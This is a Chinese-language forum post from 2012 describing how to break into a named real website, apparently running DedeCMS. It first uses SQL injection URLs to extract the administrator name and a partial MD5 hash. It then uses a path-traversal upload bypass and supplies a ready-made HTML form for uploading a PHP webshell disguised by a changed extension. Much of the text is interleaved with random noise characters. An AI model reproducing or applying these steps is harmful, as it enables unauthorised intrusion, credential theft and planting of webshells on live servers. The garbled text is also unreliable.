①注入漏洞。
W, Y' Z1 \8 X# J W这站 http://www.political-security.com/7 Z) t5 ~% x, W: l5 a9 r
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
( i# U' v2 K) `6 Lwww.political-security.com/data/mysql_error_trace.inc 爆后台
! l3 \# `) e9 j& r2 T9 x1 G然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
. b! N2 v' q5 m' B# \然后写上语句
9 B5 F9 J9 ^: {- F4 K( M6 m查看管理员帐号# C4 P0 t: b. a
http://www.political-security.co ... &membergroup=@`: e" n' s5 d7 d# U/ @2 X
9 Q3 Y5 ~1 K& [ B: W9 L, n! ladmin 0 e4 n% _" Y; E5 W
6 e% P3 x- W# d2 f2 S0 ?, |* f
查看管理员密码
9 Q& t; F9 J) i l3 h1 y http://www.political-security.co ... &membergroup=@`. h m9 I {% ^" Y' `, f5 q
# x% ]$ B& Y2 @: n2 M- K
8d29b1ef9f8c5a5af429+ d! f( D. a) J1 `( d8 f2 Y) i* y
+ l9 j3 m4 T! t: B3 E9 n1 D$ E查看管理员密码
$ }, e/ d: M7 a, ?; `: S
( q, I0 O6 h4 @$ f; @得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5# E# W2 D9 ~% G1 l) S3 D8 i' \
) e; ~9 x2 h+ \* [9 A3 E. b3 H* c8d2
) a& S0 _! Y- M& z% r9b1ef9f8c5a5af428 \* G8 a5 @3 A
92 t; ?1 W- b8 T2 S
! f& T1 D; z7 dcmd5没解出来 只好测试第二个方法' V z, `6 V9 o
5 H& ]: ?" P6 z; m. G
- a5 i L! I% |) A' g9 X②上传漏洞:1 t" @8 M* W3 p
# z3 r$ ]3 w" y6 N5 @ B c' h% X只要登陆会员中心,然后访问页面链接
, p; x, ]4 [4 J: H“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
3 Q- n. S: Q& g8 n; ?- w* W8 {9 t9 q& N6 I6 q; U2 R- i* q' _& D
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
* C: Q! d% u) U4 n) u" }' z! [ |+ l8 I* B
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
' c; x9 X6 u; G& q$ K: \4 |& ?8 W: a- v. T9 t$ X) |, w1 ?& U. W
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>9 q0 y; V+ I. w- \
或者
2 U1 x( M% P$ D) ?! P7 G2 l即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
分享
支持
反对